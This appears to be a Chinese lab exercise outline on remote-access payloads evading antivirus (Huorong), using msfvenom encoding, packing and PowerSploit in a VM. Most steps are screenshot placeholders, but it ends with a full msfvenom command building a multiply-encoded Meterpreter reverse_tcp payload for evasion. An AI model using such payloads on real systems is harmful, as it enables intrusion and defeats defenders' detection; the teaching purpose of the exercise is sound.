远程控制被控端与杀毒软件的博弈

目录

第6章 远程控制

一、引言

二、远程控制技术的定义

三、远程控制技术的安全性

四、远程控制技术的发展

五、杀毒软件的作用

六、远程控制被控端与杀毒软件的博弈

6.6 远程控制被控端与杀毒软件的博弈：

1、杀毒软件主要使用以下3种技术：

6.6.1 msfvenom提供的免杀方法

步骤一：生成一个普通的payload 

步骤二  ：到安装了火绒杀毒软件的虚拟机下载攻击载荷。

步骤三：生成一个免杀的payload

步骤四：到安装了火绒杀毒软件的虚拟机下载攻击载荷。

步骤五：对上述生成的免杀payload加壳

步骤六：到安装了火绒杀毒软件的虚拟机下载攻击载荷。

步骤七：测试payload.exe、payload02.exe和payload03.exe能不能正常连接到主控端

6.6.2 PowerSploit提供的免杀方法

步骤一：在kali中启动PowerSploit

步骤二：将PowerSploit目录当作一个网站发布

​编辑步骤三：在靶机（或其它虚拟机）中访问PowerSploit​​​​​​​

步骤四：PowerSploit功能一：检测被控端的特征码（使用AntivirusBypass）

步骤五：PowerSploit功能二：实现将DLL注入进程（使用CodeExecution）​​​​​​​

总结

第6章 远程控制

一、引言

在当今数字化时代，远程控制技术已经成为了人们日常生活和工作中不可或缺的一部分。通过远程控制技术，我们可以在任何时间、任何地点对远程设备进行操作和管理，极大地提高了工作效率和生活便利性。本文将对远程控制技术进行介绍，包括其定义、工作原理、应用场景以及安全性等方面。

二、远程控制技术的定义

远程控制技术是指通过网络等通信手段，对远程设备进行操作和管理的技术。远程控制技术可以实现对远程设备的监控、控制、维护和管理等功能，使得用户可以在不同的地点对远程设备进行操作和管理。

三、远程控制技术的安全性

远程控制技术的安全性是非常重要的，因为远程控制技术可能会导致远程设备的信息泄露和被恶意控制。为了保障远程控制技术的安全性

四、远程控制技术的发展

远程控制技术可以让用户通过网络对远程计算机进行操作和管理，这种技术在远程办公、远程维护和远程教育等领域得到了广泛的应用。然而，远程控制技术也存在着一些安全风险，例如∗控端可能会∗黑客利用来窃取敏感信息或进行其他恶意∗作。

五、杀毒软件的作用

为了应对这些安全风险，杀毒软件应运而生。杀毒软件可以检测和清除计算机中的病毒、木马和其他恶意软件，从而保护计算机的安全。此外，杀毒软件还可以实时监控计算机的网络活动，防止黑客通过网络攻击计算机。

六、远程控制被控端与杀毒软件的博弈

然而，远程控制被控端和杀毒软件之间也存在着一些博弈。一方面，远程控制被控端需要与杀毒软件进行协同工作，以确保被控端的安全。另一方面，杀毒软件也需要对远程控制被控端进行检测和防御，以防止被控端被黑客利用。 在这种情况下，远程控制被控端和杀毒软件需要不断地进行技术创新和升级，以应对不断变化的安全威胁。例如，远程控制被控端可以采用更加安全的加密技术，以防止黑客窃取被控端的敏感信息。杀毒软件也可以采用更加先进的检测技术，以更好地识别和清除恶意软件。

6.6 远程控制被控端与杀毒软件的博弈：

在远程控制过程中，被控端需要与远程控制服务器建立连接，发送和接收控制指令和数据。然而，杀毒软件可能会将远程控制软件误认为恶意软件，进行拦截和清除，从而影响远程控制的效果。为了避免这种情况，远程控制软件通常会采用一些技术手段，如加密通信、数字签名、白名单等，来证明自己的合法性和安全性，从而获得杀毒软件的信任。

1、杀毒软件主要使用以下3种技术：

1）基于文件扫描的反病毒技术

2）基本内存扫描的反病毒技术

3）基于行为监控的反病毒技术

2、黑客主要使用的免杀手段：

  1）修改特征码

  2）添加花指令

  3）程序加密（加壳）

6.6.1 msfvenom提供的免杀方法

步骤一：生成一个普通的payload 

（输入命令、结果截图并进行必要说明）

步骤二  ：到安装了火绒杀毒软件的虚拟机下载攻击载荷。

（下载被控端，火绒杀毒软件是否弹出警告？）

（输入命令、结果截图并进行必要说明）

步骤三：生成一个免杀的payload

1. 查看msfvenom中可用的编码方式

2、使用评级为low的编码方式/x86/nonalpha生成一个免杀的payload

（执行2次，2次生成的Shellcode相同吗？）

3、使用评级为excellent的编码方式生成一个免杀的payload

（1）执行第1次（采用默认的1次编码）：

（2）执行第2次（采用默认的1次编码）：

（结果：执行2次，2次生成的Shellcode相同吗？）

（3）执行第3次（使用多次编码、多重编码）：

（上述输入命令、结果截图并进行必要说明）

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.133 lport=6666 -e x86/shikata_ga_nai  -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows